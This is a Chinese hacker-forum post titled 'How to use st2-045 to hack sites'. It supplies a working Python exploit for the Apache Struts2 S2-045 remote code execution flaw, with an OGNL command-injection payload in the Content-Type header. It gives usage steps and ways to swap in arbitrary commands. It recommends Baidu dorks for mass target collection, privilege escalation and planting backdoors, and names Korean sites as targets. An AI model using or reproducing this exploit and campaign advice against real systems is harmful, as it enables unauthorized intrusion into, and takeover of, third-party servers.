如何利用st2 045 搞站

congtou 2017-3-7 原创推荐 0 2
hello 大家好,我是大老李 ,刚爆出的漏洞相信大家都在搞,工具啥的也都出来了, 有些人不会用,老夫也是研究了一会才会用了  。流传出的exp脚本是py的我用kali搞的 以下是代码
#! /usr/bin/env python
# encoding:utf-8
import urllib2
import sys
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers

def poc():
register_openers()
datagen, header = multipart_encode({"image1": open("tmp.txt", "rb")})
header["User-Agent"]="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
    header["Content-Type"]="%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ifconfig').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
    request = urllib2.Request(str(sys.argv[1]),datagen,headers=header)
response = urllib2.urlopen(request)
print response.read()

poc()

在kali 里面执行命令是这样的  root@lunge:~/桌面# python st2-045.py url    下附截图

解释一下 我们把上面的代码粘贴到一个77169.py里面  然后仍到桌面   cd 桌面  进入桌面  然后输入  python 77169.py 运行本脚本  后面跟上url  直接运行肯定是不行的,我们还要在桌面上 tmp.txt 空的txt文件就可以了     然后代码有段这个(#cmd='ifconfig')把ifconfig  可以 替换成自己想要的命令   py的exp说完了  我们又自己做了个图形化的 简单方便 贼拉拉的爽下附截图

呜哈哈  没后门哈搞站过程 很简单  可以批量搞,代码如下inurl:.action intitle:xxx直接百度采集一波

你懂得  然后挨个怼吧   各种提权  各种上马    不过出现这种漏洞  第一个要测的还是乐天,韩国啥的

然并卵 这不就搞定了吗  还等什么呢  拿上exp 挂好vpn 向着root权限冲吧!华盟图形化st2 045

工具下载地址请阅读原文:http://bbs.77169.com/forum.php?mod=viewthread&tid=356316&fromuid=405039

转载请注明来自华盟网,本文标题:《如何利用st2 045 搞站》

喜欢 (2) 发布评论